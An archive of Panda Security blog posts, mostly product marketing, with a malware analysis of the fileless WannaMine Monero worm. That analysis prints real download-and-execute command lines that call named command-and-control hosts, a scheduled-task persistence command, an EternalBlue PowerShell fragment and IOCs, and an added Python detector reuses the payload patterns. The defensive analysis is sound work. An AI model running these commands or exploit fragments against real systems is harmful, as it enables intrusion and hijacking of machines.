Tag Archives: adaptive defense

Meltdown and Spectre, behind the first security hole discovered in 2018

The security flaw affects virtually every operating system, in particular those based on Intel, AMD and ARM processors.

2018 could not have had a worse start from a cyber-security perspective as, yesterday, a major security hole was found in Intel, AMD and ARM processors.  The critical flaw discovered in the affected computers’ architecture and operating system has rocked the technology industry, and developers around the world have rushed to roll out fixes.

The vulnerability, leveraged by the Meltdown exploit on Intel systems, is particularly worrying as it can lead to exfiltration of sensitive data such as login credentials, email messages, photos and other documents. It enables attackers to use a malicious process run at user level on the affected workstation or server in order to read other processes’ memory, even that of high-privileged kernel processes.

The flaw can hit home users and virtually every company, as Spectre affects all kinds of computers: desktops, laptops, Android smartphones, on-premises servers, cloud servers, etc. The more critical information handled by a potential victim, the greater the risk to suffer the attack.

Microsoft and Linux have already released updates to protect their customers. We’d like to inform our customers and partners that the tests carried out by Panda Security show that there are no compatibility conflicts between our endpoint security solutions and Microsoft’s security update.

At present, there is no evidence of public security attacks leveraging the flaw, but judging from past experience, it is not at all improbable that we may witness an avalanche of Trojans and spam campaigns attempting to exploit the vulnerability.

How to mitigate the vulnerability

Newer generation processors are not affected by the flaw; however, replacing all vulnerable systems is not a viable option at this time.

For that reason, the only possible countermeasure at this stage is to mitigate the vulnerability at operating system level. Microsoft and Linux are working on or have patches ready that prevent the exploitation of this hardware bug, with Linux being the first vendor to release a fix.

Microsoft, which initially planned to include a patch in the security update scheduled for Tuesday January 9, released a fix yesterday that is already available on the most popular operating systems and will be gradually deployed to all other systems. For more information, please visit this page.

It is worth mentioning that Microsoft’s security patch is only downloaded to target computers provided a specific registry entry is found on the system. This mechanism is designed to allow for a gradual update of systems coordinated with security software vendors. This way, computers will only be updated once it has been confirmed that there is no compatibility issue between the patch and the current security product.

Technical Support

For more information, please refer to the following technical support article. There you will find detailed information about the Microsoft patch validation process, how to manually trigger the patch download, and the way our products will be gradually updated to allow the automatic download of the new security patch just as with any other update.

We’d also like to encourage you to consult the detailed information available about Microsoft’s security update and the potential impact it can have on desktop, laptop and server performance.

Finally, Microsoft, Mozilla and Google have warned of the possibility that the attackers may try to exploit these bugs via their Web browsers (Edge, Firefox and Chrome), and that temporary workarounds will be released over the next few days to prevent such possibility. We recommend that you enable automatic updates or take the appropriate measures to have your desktops, laptops and servers properly protected.

Cyber-Security recommendations

Additionally, Panda recommends that you implement the following best security practices:

  • Keep your operating systems, security systems and all other applications always up to date to prevent security incidents.
  • Do not open email messages or files coming from unknown sources. Raise awareness among users, employees and contractors about the importance of following this recommendation.
  • Do not access insecure Web pages or pages whose content has not been verified. Raise awareness among home and corporate users about the importance of following this recommendation.
  • Protect all your desktops, laptops and servers with a security solution that continually monitors the activity of every program and process run in your organization, only allowing trusted files to run and immediately responding to any anomalous or malicious behavior.

Panda Security recommends that all companies adopt Panda Adaptive Defense 360, the only solution capable of providing such high protection levels with its managed security services. Discover how Panda Adaptive Defense 360 and its services can protect you from these and any future attacks.

Customers using our Panda Security home solutions also enjoy maximum protection as they feed off the malware intelligence leveraged by Panda Adaptive Defense 360, as shown in the latest independent comparative reviews. The protection capabilities of Panda Security’s technologies and protection model are demonstrated in the third-party tests conducted by such prestigious laboratories as AV-Comparatives.

How do these vulnerabilities affect Panda Security’s cloud services?

Cloud servers where multiple applications and sensitive data run simultaneously are a primary target for attacks designed to exploit these hardware security flaws.

In this respect, we’d like to inform our customers and channel partners that the cloud platforms that host Panda Security’s products and servers, Azure and Amazon, are managed platforms which were properly updated on January 3, and are therefore protected against any security attack that takes advantage of these vulnerabilities.

What effect do these vulnerabilities have on AMD and ARM processors?

Although the Meltdown bug seems to be limited to Intel processors, Spectre also affects ARM processors in Android and iOS smartphones and tablets, as well as in other devices.

Google’s Project Zero team was the first to report the Spectre flaw, on June 1, 2017, and reported the Meltdown bug before July 28, 2017. The latest Google security patch, released in December 2017, included mitigations to ‘limit the attack on all known variants on ARM processors.’

Also, the company noted that exploitation was difficult and limited on the majority of Android devices, and that the newest models, such as Samsung Galaxy S8 and Note 8, were already protected. All other vendors must start rolling out their own security updates in the coming weeks.

The risk is also small on unpatched Android smartphones since, even though a hacker could potentially steal personal information from a trusted application on the phone, they would have to access the targeted device while it is unlocked as Spectre cannot unlock it remotely.

Apple’s ARM architecture chips are also affected, which means that the following iPhone models are potentially vulnerable: iPhone 4, iPhone 4S, iPhone 5 and iPhone 5C. Apple has not released any statements regarding this issue, so it is possible that they managed to fix the flaw in a previous iOS version or when designing the chip.

As for the consequences and countermeasures for AMD processors, these are not clear yet, as the company has explained that its processors are not affected by the Spectre flaw.

We’ll keep you updated as new details emerge.


The post Meltdown and Spectre, behind the first security hole discovered in 2018 appeared first on Panda Security Mediacenter.


2017 in Figures: The Exponential Growth of Malware

2017 was especially hectic for cybercrime, especially when it comes to malware and its offshoots. The increased number of attacks and, above all, the professionalization of the techniques used by cybercriminals has been at the root of malware’s exponential proliferation. In 2017 alone (according to data collected up to September 20), PandaLabs registered 15,107,232 different malware files that we had never seen before. But the total number of new malware is much higher — up to 285,000 new malware samples every day.

It makes perfect sense that the top 10 of malware files in our cloud includes names like WannaCry, the ransomware that caused havoc in business networks around the world, and a version of CCleaner, installed by more than two million users. But in addition to the trends that have been making headlines everywhere, what conclusions can we draw about the state of malware in 2017? We discuss the essentials in PandaLabs’ Annual Report.

Malware’s Attempt to Go Unnoticed

Upon reviewing the figures, we see that of the 15,107,232 files registered, 99.10% (14,972,010 files) have been seen only once. Only 989 malware files (0.01%) have been seen on more than 1,000 computers. This corroborates what we already knew: namely, that aside from a few exceptions — such as the abovementioned WannaCry or HackCCleaner — most malware changes every time it infects, so each copy has a very limited distribution.

This year’s data makes it clear that although there are many more types of malware, each of them infects only a few devices individually. By attacking the minimum number of possible devices, each specimen reduces the risk of being detected and fulfils its purpose: to go unnoticed and ensure the attack’s success.

In any case, the total number of new malware samples (15 million) is not so relevant when it comes to calculating risk. What really affects us is the frequency with which we can individually confront the malware itself. To evaluate this risk, PandaLabs measured only those malware infection attempts that were not detected by signatures or by heuristics.

Recommendations for a Malware-free 2018

Following these tips will help reduce the risk of becoming a victim of malware:

  • Think before you click: do not access links sent to you by strangers.
  • Avoid downloading applications from unreliable sources.
  • Do not wait until tomorrow — keep up with system updates.
  • Use strong passwords to protect your identity.
  • Choose an advanced cybersecurity platform.

Our protection technologies improve and are updated as the amount of malware grows, which is why we are able to detect the threats that other solutions cannot. Panda Adaptive Defense is keeping up with threats and offers the market the services and tools needed to face whatever awaits in 2018. We’re ready to take on the new year!


Threat Hunting, the Investigation of Fileless Malware Attacks

Fileless Monero WannaMine, a new attack discovered by PandaLabs

Mining cryptocurrencies like Bitcoin, Ethereum or Monero is nothing new. In fact, in recent years we have seen numerous attacks whose main objective is the installation of mining software. For example, it is worth remembering that before WannaCry, we had already seen attackers use the NSA EternalBlue exploit to infiltrate companies and install this type of software on their victims’ devices.

It’s safe to say that it is a booming business, as sophistication of the attacks continues to increase. A few days ago we detected a new worm that uses both hacking tools and scripts to spread through corporate networks and mine the Monero cryptocurrency in any network it makes its way into.

With Adaptive Defense, we monitor all running processes in real time on every computer where it is installed. When our Threat Hunting team observed the following command attempting to execute through one of the processes on one computer, alarms were raised:

cmd /v:on /c for /f "tokens=2 delims=.[" %i in ('ver') do (set a=%i)&if !a:~-1!==5 (@echo on error resume next>%windir%11.vbs&@echo Set ox=CreateObject^("MSXML2.XMLHTTP"^)>>%windir%11.vbs&@echo ox.open "GET","http://stafftest.firewall-gateway.com:8000/info.vbs",false>>%windir%11.vbs&@echo ox.setRequestHeader "User-Agent", "-">>%windir%11.vbs&@echo ox.send^(^)>>%windir%11.vbs&@echo If ox.Status=200 Then>>%windir%11.vbs&@echo Set oas=CreateObject^("ADODB.Stream"^)>>%windir%11.vbs&@echo oas.Open>>%windir%11.vbs&@echo oas.Type=1 >>%windir%11.vbs&@echo oas.Write ox.ResponseBody>>%windir%11.vbs&@echo oas.SaveToFile "%windir%info.vbs",2 >>%windir%11.vbs&@echo oas.Close>>%windir%11.vbs&@echo End if>>%windir%11.vbs&@echo Set os=CreateObject^("WScript.Shell"^)>>%windir%11.vbs&@echo os.Exec^("cscript.exe %windir%info.vbs"^)>>%windir%11.vbs&cscript.exe %windir%11.vbs) else (powershell -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http://stafftest.firewall-gateway.com:8000/info6.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http://stafftest.firewall-gateway.com:8000/info3.ps1')}")

Analysis of Network Propagation

Soon after beginning our investigation from PandaLabs, we observed how the attackers, knowing that they’d been discovered, closed off command and control servers, but before they could we were able to download the following files:

  • b6fcd1223719c8f6daf4ab7fbeb9a20a (ps1, ~4MB)
  • 27e4f61ee65668d4c9ab4d9bf5d0a9e7 (vbs, ~2MB)

They are two highly obfuscated scripts. “Info6.ps1” reflectively loads a Mimikatz module (a DLL) into memory, leaving the disk untouched, so that it can steal credentials. These credentials are used later to move laterally across internal (unprotected) networks.

The script implements, in PowerShell, the well-known NetBIOS exploit EternalBlue (MS17-010), so that it can go on to infect other not-yet-patched Windows computers on the network.

$TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
[byte[]]$feaList=[byte[]](0x00,0x00,0x01,0x00)
$feaList += $ntfea[$NTFEA_SIZE]
$feaList +=0x00,0x00,0x8f,0x00+ $fakeSrvNetBuffer
$feaList +=0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct=@(0x00,0x00,0x00,0x00,0x00,0x00

At the same time it makes use of WMI to remotely execute commands. Once the passwords for a computer are obtained, we see the “wmiprvse.exe” process on that computer execute a command line similar to the following:

powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4Ad…

If we decode the Base64 of this command line, we obtain the script shown in Annex I.

Persistence in the System

Within one of the scripts, the following command can be found to achieve persistence in the system:

cmd /c echo powershell -nop "$a=([string](Get-WMIObject -Namespace rootSubscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}" >%temp%y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR "%temp%y1.bat" &&SCHTASKS /run /TN yastcat

As you can see, it creates a daily scheduled task (“yastcat”) that runs the “y1.bat” file, which in turn downloads and executes the “mate6.ps1” script, unless a WMI subscription named “SCM Event Filter” is already present.

Note that we do not have this script at our disposal, as the command and control servers are currently offline.
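One way to turn the command lines shown above into detection logic, as an added example that is not part of the original post or of Panda’s products: a small rule set run over constructed process-creation events, including decoding of a PowerShell -E (Base64, UTF-16LE) payload so that the download-and-execute pattern is caught even when it is hidden inside the encoded command. Hosts (c2.example.invalid) and rule names are placeholders chosen for the example.

```python
import base64
import re
from typing import Dict, List, Optional


def _encode_ps(script: str) -> str:
    """powershell -E takes Base64 of the UTF-16LE script; used here only to build a sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events modelled on the command lines in the post.
# Hosts are placeholders (c2.example.invalid), not the servers named in the analysis.
PAYLOAD = "IEX(New-Object Net.WebClient).DownloadString('http://c2.example.invalid:8000/info6.ps1')"

SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process | Sort-Object CPU"},
    {"id": 2, "parent": "cmd.exe",
     "cmdline": ("powershell -NoP -NonI -W Hidden \"if((Get-WmiObject Win32_OperatingSystem)"
                 ".osarchitecture.contains('64')){" + PAYLOAD + "}\"")},
    {"id": 3, "parent": "wmiprvse.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -E " + _encode_ps(PAYLOAD)},
    {"id": 4, "parent": "cmd.exe",
     "cmdline": ("cmd /c echo powershell -nop \"$a=([string](Get-WMIObject -Namespace root\\Subscription"
                 " -Class __FilterToConsumerBinding));if(($a -eq $null) -or"
                 " (!($a.contains('SCM Event Filter')))) {" + PAYLOAD + "}\" >%temp%\\y1.bat"
                 " && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR \"%temp%\\y1.bat\""
                 " && SCHTASKS /run /TN yastcat")},
    {"id": 5, "parent": "explorer.exe",
     "cmdline": "SCHTASKS /create /SC WEEKLY /TN NightlyBackup /TR \"C:\\Tools\\backup.exe\""},
    {"id": 6, "parent": "cmd.exe", "cmdline": "cscript.exe %windir%\\11.vbs"},
]

# -E / -EncodedCommand followed by a Base64 token (PowerShell accepts any unambiguous prefix).
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script behind -E, or None if the line carries no decodable payload."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> List[str]:
    """Return the names of the rules a command line triggers (empty list = nothing suspicious)."""
    hits = []
    lower = cmdline.lower()
    decoded = decode_encoded_command(cmdline)
    # Rules that look at the visible command line only.
    if "powershell" in lower and re.search(r"-w(?:indowstyle)?\s+hidden", lower) \
            and re.search(r"-nop\b|-noprofile\b", lower):
        hits.append("powershell_hidden_noprofile")
    if decoded is not None:
        hits.append("powershell_encoded_command")
    if re.search(r"schtasks\s+/create", lower) and "/ru system" in lower and "%temp%" in lower:
        hits.append("scheduled_task_as_system_from_temp")
    if re.search(r"\b[cw]script(?:\.exe)?\s+%windir%", lower):
        hits.append("script_host_running_from_windir")
    if ">%windir%" in lower and ".vbs" in lower:
        hits.append("vbs_written_to_windir")
    # Rules that must also see inside a decoded -E payload.
    body = lower + ("\n" + decoded.lower() if decoded else "")
    if "downloadstring(" in body and ("iex(" in body or "invoke-expression" in body):
        hits.append("download_and_execute_remote_script")
    if "__filtertoconsumerbinding" in body:
        hits.append("wmi_subscription_probe")
    return hits


def triage(events: List[dict]) -> Dict[int, List[str]]:
    """Map each event id to its rule hits, keeping only events that triggered something."""
    return {e["id"]: analyze(e["cmdline"]) for e in events if analyze(e["cmdline"])}


if __name__ == "__main__":
    for event_id, rules in triage(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(rules))
```

The benign events (a plain Get-Process and an administrator’s weekly backup task) trigger nothing, while the encoded command launched by wmiprvse.exe is flagged only because the -E payload is decoded before the rules run.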

Infection Vector

We still do not know the initial infection vector, since networks on which we detected and blocked the infection were in the process of deploying Adaptive Defense at that time and did not have the whole network protected with our advanced cybersecurity solution. For this reason, we have not been able to determine who the “patient zero” was and how it became compromised.

It could be a download/execution of a file/Trojan that initially activated the worm, or it could have been executed remotely using some exploit.

Command and Control Servers

From the “info6.ps1” script, we were able to obtain the following command and control servers:

  • stafftest.spdns.eu
  • stafftest.firewall-gateway.com
  • 107.179.67.243
  • 118.184.48.95

Note that on October 27, 2017, these servers ceased to be operative.

IOCs

  • exe (Monero client, MD5 2ad7a39b17d08b3a685d36a23bf8d196)
  • %windir%11.vbs
  • %windir%info.vbs
  • %windir%info6.ps1
  • dll
  • dll
  • Scheduled task “yastcat”
  • spdns.eu
  • firewall-gateway.com
  • 107.179.67.243
  • 118.184.48.95

Conclusion

Once again, we are witnessing the professionalization of increasingly advanced attacks. Even when it is only a matter of installing Monero miners (and we leave aside data theft, sabotage, or espionage), attackers are using advanced techniques and sharp tactics. The fact that it is a fileless attack makes it so that a majority of traditional antivirus solutions are barely able to counteract or even detect it, and its victims can only wait for the necessary signatures to be generated (the attack is fileless, but as we have seen at one point, both the scripts and the Monero client are downloaded).

But such signatures only cover this particular attack; anything that varies even slightly will slip past them, not to mention that only the final stage of the attack is detected, without seeing how it moves through the network and compromises computers.

Since Adaptive Defense classifies every running process on every computer, we are able to monitor the entire network in real time, something which is becoming increasingly necessary as attackers resort to malwareless techniques in which they abuse legitimate system tools.

Among the events we monitor, we can find:

  • Process creation and remote injection
  • Creation, modification and opening of files
  • Creation and modification of registry entries
  • Network events (connections opened, file downloads, etc.)
  • Administrative events (creation of users, etc.)

We will keep you updated with any findings from our Threat Hunting, as well as the detection of any new attacks.


The Scariest Cyber Nightmares in Recent Years

Halloween is just around the corner. As the day approaches, we have to be aware that “trick or treat” means something a little more sinister when it comes to cybercriminals. They may play some bothersome pranks, or they may in fact try to infect our computers with real, no-joke malware that will undoubtedly ruin our holiday spirits.

This Halloween will be marked by threats and cyberattacks organized by criminal groups that shake the foundations of businesses and infrastructures every day. In 2017, WannaCry showed us how it was possible to indiscriminately attack corporate networks all over the world. We’ve also seen surgical attacks, like Petya/GoldenEye, whose target was much more defined. Then, just in time for the spookiest holiday of the year, we saw the big Bad Rabbit.

These are just a few recent cases, but can you remember the most terrifying attacks of recent years?

Hackers and Organized Groups, the Latest Cyber Nightmare

There are all different types of hackers with a wide variety of motives. From the cyber arms dealer — a hacker who develops and sells malware and other hacking tools and exploit kits —  to other cybercriminals specializing in ransomware; from so-called bankers (hackers specialized in credit or financial card information theft) to contract hackers who belong to a well-established industry and who offer their services in return for remuneration.

They are all behind the most terrifying cyber nightmares, creating diabolical malware and exploiting tenebrous vulnerabilities to haunt your company.

Protect Your Company Year-Round and Enjoy a Bone-Chilling Halloween

Using the right tools is essential to keeping your network safe. A defense method able to protect against malware of all types, even before an attack can begin, is indispensable. Such solutions allow continuous monitoring of network and endpoint activity in real time. Panda Adaptive Defense is a pioneer in this type of technology, and combines state-of-the-art protection with detection and remediation capabilities with the ability to classify 100% of running processes. This approach secures the system against external attacks, and even attacks originating within the network itself.

Make sure Halloween comes only once a year. Manage, control and protect your data against all kinds of advanced threats.


Don’t Let Yourself Become the Next Equifax

Last month we wrote about the biggest hack of sensitive personal data in history. Equifax, the financial entity that manages data for more than 820 million consumers and more than 91 million businesses around the world, suffered a global attack by an organized group called the PastHole Hacking Team, affecting customer data not only from the United States, but also Canada and the United Kingdom.

Following the recent events, it has come to light that the massive hacking attack is not the only grievance that the company has suffered. As it turns out, there was also malware on the company’s website.

Ars Technica reports that a security analyst named Randy Abrams came to the site to check his credit information when he encountered a fake Adobe Flash installer, one of those pop-ups that abound on the internet and demand that you “click here”, only to redirect you to some malicious site full of internet junk.

The subsequent analysis revealed that the “promoted” malicious software is called Adware.Eorezo and is marked as malware by only three cybersecurity solutions in the world, including Panda Security, testament to the great effort that went into hiding the code so as to cause as much damage as possible.

Panda’s good performance against Adware.Eorezo coincides with the AV-Comparatives Business Security Report recognizing the Adaptive Defense 360 smart cybersecurity solution. This platform would successfully prevent an organization from becoming the victim of an attack such as Equifax. In the words of the independent laboratory, “Panda Adaptive Defense 360 is managed by a well-designed, clearly laid-out cloud-based console, which would be very straightforward for less-experienced administrators to use. This makes it particularly suitable for small businesses, while its EDR features will make it appealing to corporations.”

Now, the question is, how did attackers manage to slip past the security barriers at Equifax, a site with troves of incredibly sensitive data? Things may have turned out differently with the right security solution. Only unlimited visibility and total real-time control of advanced threats can be effective in protecting the IT infrastructure.


Debunking the Myths of the GDPR

The GDPR (General Data Protection Regulation) is a hot topic among experts in cybersecurity and privacy. For consumers, the GDPR will strengthen the protection of basic rights on the internet and give control of personal data back to the user. But what does this mean for companies?

As the date for its entry into force approaches, and having explained the most important changes the regulation will bring about, in this article we will have a look at some of the myths surrounding the GDPR.

Myth 1: “The GDPR only affects companies in the European Union”

This is far from being the truth. The GDPR rules will apply to all companies that offer goods or services to people from the EU, regardless of where their offices or servers are located. Therefore, the GDPR applies to all companies that process information from EU citizens, making this the first global data protection law. For example, if an EU citizen uses a US-based social network, makes an ecommerce transaction in Japan, or uses an Argentinian platform for vacation rentals, all those companies must comply with the GDPR.

Myth 2: “All security incidents must be reported within 72 hours”

This is one of the most widespread myths and has been accepted as a general rule, but there is some nuance to it. First, only personal data leaks need to be reported — it is not required in the case of security incidents or data breaches that do not involve personal data. This means that any breach that affects the confidentiality or integrity of personal information must be reported.

Moreover, the countdown for the 72 hour deadline does not start when the incident occurs, but rather when the company becomes aware that it has suffered a personal data breach. If for some reason it is not possible to report the breach to the authorities within this time period, the limit can be extended provided that the organization justifies the delay.

Myth 3: “All data must be encrypted in order to be in compliance with the GDPR”

This is false for several reasons. The GDPR requires that measures be implemented to provide an appropriate level of security, based on an assessment of the risk involved in any action that requires, for example, the processing or storage of personal data.

Although encryption is a recommended measure, it is not a must. Everything depends on the risks associated with not encrypting said personal data. Thus, in the case of sensitive data, such as patient medical information, the GDPR recommends encryption and other robust security measures, such as secure algorithms.

Panda Security Can Help Ease the Transition

These are just three of the myths shrouding a regulation that will mark a before and after in the protection of personal data. To help all types of companies adapt and comply with the GDPR, at Panda we have prepared the “Preparation Guide to the New European General Data Protection Regulation”. In this guide, we respond to major issues related to the GDPR: How does it affect my business? What obligations does this regulation bring about? What happens if I do not comply with these obligations?

With this whitepaper, and using tools included in our Adaptive Defense solution, Panda can help meet the requirements imposed by the new regulation. Although the law will not come into effect until 2018, it is vital to understand the implications of the GDPR and to implement a plan of action.


Building Resistant Companies

Ransomware is on the rise, and in recent years has become one of the biggest headaches for IT departments in both large and small organizations. With 90 million attacks worldwide in 2016, and more than 180 million attacks expected for 2017, the million-dollar question is: how do we face these attacks? At Panda Security and Deloitte EMEA, we have no doubt about the matter — corporations can protect themselves by building their resistance.

The right approach and continuous response capabilities

Our new aim is to face the challenge jointly, both structurally and in terms of the methodologies used by Panda Security and Deloitte EMEA. Increasingly aware of traditional security solutions’ shortcomings, namely their inability to handle attacks that use advanced techniques, such as those that use non-malicious tools, we made the decision to be proactive and reinvent cybersecurity.

How will we do this? With an advanced solution based on situational analysis:

  • Attackers are now more efficient than ever before. While attackers are able to compromise systems in just minutes or hours, businesses often take months or even years to react.
  • They attack the endpoint because it is from there that they can access other targets, exfiltrate information, steal credentials, or deploy other attacks.
  • The lack of resources and expertise at companies is evidenced by the statistic that barely 4% of security alerts are investigated.

And we will also be watching the challenges that our clients face:

  • The availability of ransomware-as-a-service
  • Negative economic and reputational side effects
  • Data and productivity loss
  • Data protection initiatives in light of the GDPR

The result? A cyberintelligence platform that categorizes and correlates all of the data obtained about cyberthreats to carry out Prevention, Detection, Response, and Remediation tasks, combined with attack surface reduction services rendered by Adaptive Defense.

Panda and Deloitte: an anti-ransomware alliance

Recent events have proven the strength of a security model that has the answers to clients’ needs:

  • Deloitte EMEA, invulnerable to the latest security breaches: this past week, we’ve learned that unknown actors allegedly had access to Deloitte USA’s email for months, with no major setbacks. However, the European branch, protected by Adaptive Defense, was unaffected by the cyberattack.
  • The major ransomware attacks of the year: both the WannaCry ransomware, which affected more than 150 countries and carried with it losses reaching up to 4 billion dollars, and the subsequent Petya/GoldenEye attacks, never reached a single Adaptive Defense user who had lock mode activated.

Governments and large public and private companies are betting on this strategy, making Adaptive Defense the best-selling security solution in the history of Panda Security, with a global market share of over 22% in EDR solutions. Multinationals in all types of strategic sectors (financial, telecommunications, military, energy, etc.) rely on Panda Security to protect their systems with Adaptive Defense.


Post-vacation cybersecurity tuneup: Get your company ready!


It’s that time of the year when most of us return to the stress of our jobs after having enjoyed a well-deserved summer vacation. But, if getting over the post-vacation blues is hard for anyone, for the members of the IT team it is a real nightmare: out-of-date computers, new software vulnerabilities, systems that do not work, organizational changes… It’s time to get ready for the situations you’ll have to face in the return to normality. And you better do it as thoroughly as possible to avoid risks. Here is a list of things you need to do in order to make sure that everything is in order.

Update

The first thing you must certainly do is update all systems, patch all applications, and download the latest malware signatures and security updates. This process is critical and must be completed immediately. You never know what may have happened during the time you’ve been on vacation.

Check your operating systems’ hardening status

Hardening your computers’ operating systems is essential to keep your entire network safe. There are some differences between general and specific hardening. However, in both cases you must check that all necessary security measures are properly in place. And if you don’t have a hardening plan yet, now is the time to implement one. Evaluate the possibility of unauthorized access, prevent user misuse, protect your network from known attack vectors, etc.

Review security rules with your network users

It is essential that your organization’s employees and other users are aware of the basic security protocols required to ensure network protection. Remind them of the need to comply with the company’s password policy, and ban the installation of non-corporate software on corporate computers. Reviewing all of these security aspects and procedures with your employees will save you from future headaches.

Use a centralized security tool

The best security solution for your business is a centralized defense system that allows you to monitor your network in real time, make decisions, and take immediate action. With Panda Endpoint Protection, you’ll be able to keep your company safe from a single, centralized, cloud-based console, across all platforms and with minimal resource consumption.

Monitor your networks

Having a good intrusion detection system (IDS) is crucial. Intrusion detection systems inspect network traffic thoroughly, comparing it against identifiers of known attacks and suspicious behavior. Check the host-based IDS (HIDS) deployed to your customers and your network IDS to make sure that everything is in order.

Check your firewall rules

Having a good firewall is essential too. Hardware firewalls are great allies, but perimeter protection rules must be regularly checked and updated. Some security solutions, such as Panda Adaptive Defense, allow organizations to monitor connections efficiently and automatically, maximizing efficiency and minimizing efforts.
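Reviewing perimeter rules by eye does not scale, so the following Python script is added here as an example (not code from the original post or from Panda Adaptive Defense) of the checks an automated review performs: it walks a constructed, first-match-wins rule list and reports allow-anything rules, rules that can never be reached because an earlier rule already matches the same traffic (shadowed if the actions agree, conflicting if they differ), and a rule set that does not end in an explicit deny-all. The rule tuple format is a hypothetical one chosen for this example rather than any vendor’s syntax.

```python
import ipaddress
from typing import NamedTuple, Union

# Constructed rule set in a hypothetical (action, proto, src, dst, port) format,
# evaluated top to bottom, first match wins. Addresses are private/documentation ranges.
RULES = [
    ("allow", "tcp", "10.0.0.0/8",  "10.1.2.3/32", 443),
    ("allow", "tcp", "0.0.0.0/0",   "0.0.0.0/0",   "any"),  # allows everything
    ("allow", "tcp", "10.0.1.0/24", "10.1.2.3/32", 443),    # already covered by rule 0
    ("deny",  "any", "0.0.0.0/0",   "0.0.0.0/0",   "any"),  # explicit default deny
]


class Rule(NamedTuple):
    action: str
    proto: str
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    port: Union[int, str]


def parse_rules(raw):
    """Turn the tuple form into Rule objects with parsed networks."""
    return [Rule(a, p, ipaddress.ip_network(s), ipaddress.ip_network(d), port)
            for a, p, s, d, port in raw]


def _matches_everything(rule):
    return (rule.src.prefixlen == 0 and rule.dst.prefixlen == 0
            and rule.port == "any")


def covers(outer, inner):
    """True if every packet matched by `inner` is also matched by `outer`."""
    return ((outer.proto == "any" or outer.proto == inner.proto)
            and (outer.port == "any" or outer.port == inner.port)
            and inner.src.subnet_of(outer.src)
            and inner.dst.subnet_of(outer.dst))


def audit(rules):
    """Return a list of (rule index, finding kind, detail) for the rule set."""
    findings = []
    for i, rule in enumerate(rules):
        if rule.action == "allow" and _matches_everything(rule):
            findings.append((i, "overly-permissive", "allow from any to any on any port"))
        for j in range(i):
            if covers(rules[j], rule):
                kind = "shadowed" if rules[j].action == rule.action else "conflicting"
                findings.append((i, kind, f"never reached: rule {j} already matches this traffic"))
                break  # reporting the first shadowing rule is enough
    last = rules[-1] if rules else None
    if last is None or not (last.action == "deny" and last.proto == "any"
                            and _matches_everything(last)):
        findings.append((len(rules), "no-default-deny",
                         "rule set does not end with an explicit deny-all"))
    return findings


if __name__ == "__main__":
    for index, kind, detail in audit(parse_rules(RULES)):
        print(f"rule {index}: {kind}: {detail}")
```

On the constructed set the audit reports rule 1 as overly permissive and rule 2 as shadowed by rule 0; the final deny-all satisfies the default-deny check. The coverage test relies on `IPv4Network.subnet_of`, available since Python 3.7; the example handles IPv4 only, so mixed-family rule sets would need the version check added before `subnet_of` is called.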

ISO 27001, your best ally

ISO/IEC 27001 is an information security management standard that specifies all the directives you must follow to keep your corporate network safe. Regardless of whether or not you pursue certification, the ISO standard can be used to check that you comply with every single security procedure required to ensure that your systems are operating properly. The recommendations above are just a summary of the directives included in the ISO standard, which covers all of them and much more. Faithfully following all these recommendations may seem difficult, but it is definitely the best starting point to make sure your business runs smoothly. And what better time to do this than now, when you have just returned to work charged up after your vacation?

The post Post-vacation cybersecurity tuneup: Get your company ready! appeared first on Panda Security Mediacenter.


Panda Security and Deloitte Have Exciting Announcement for the Gartner Summit

Following the success of the Gartner Security & Risk Management Summit in the US, Panda Security will also be participating in the London conference held on 18-19 September 2017. The summit will address the major challenges facing IT security leaders today. Analysts, panellists, and presenters will offer proven practices, technologies and methods to help organizations adjust to digital transformation and manage the increase in cybersecurity risks.

Panda Security will discuss how to protect your business with Adaptive Defense, the new cybersecurity model. We will be at Booth #S24.

In addition to sharing experiences at stand S24, we will be giving a joint presentation in conjunction with Deloitte. Juan Santamaría, General Manager of Panda, and Edward Moore, Associate Director of Cybersecurity at Deloitte EMEA, will discuss the fundamentals of cyberdefense for companies. In a talk titled ‘From Incident Response to Continuous Response Management, Building Resilience in Organizations’, we will discuss how to avoid economic losses and reputational damages brought about by cyberattacks such as ransomware. The session will be held on Tuesday 19 September, from 10:35-10:55 in the Solution Showcase Theatre on Level 1.

As 100% prevention is not possible, organizations must continually improve their detection and incident response capabilities to significantly reduce the probability of experiencing a damaging breach.

Learn from the directors of Panda Security and Deloitte EMEA how to maximise returns on your company’s investments using the latest resilience practices.

Adaptive Defense, the Common Link Between Deloitte and Panda Security

Businesses are currently facing unprecedented challenges as they handle the volume and speed of modern digital interactions. With exponential increases in attacks originating from unknown threats (up more than 40% from last quarter alone), it’s logical to conclude that companies need to be doing more to reinforce their security and control. It’s for this reason that Panda Security and Deloitte EMEA have created a Cyber Alliance to provide an integrated, dynamic, and adaptive security ecosystem.

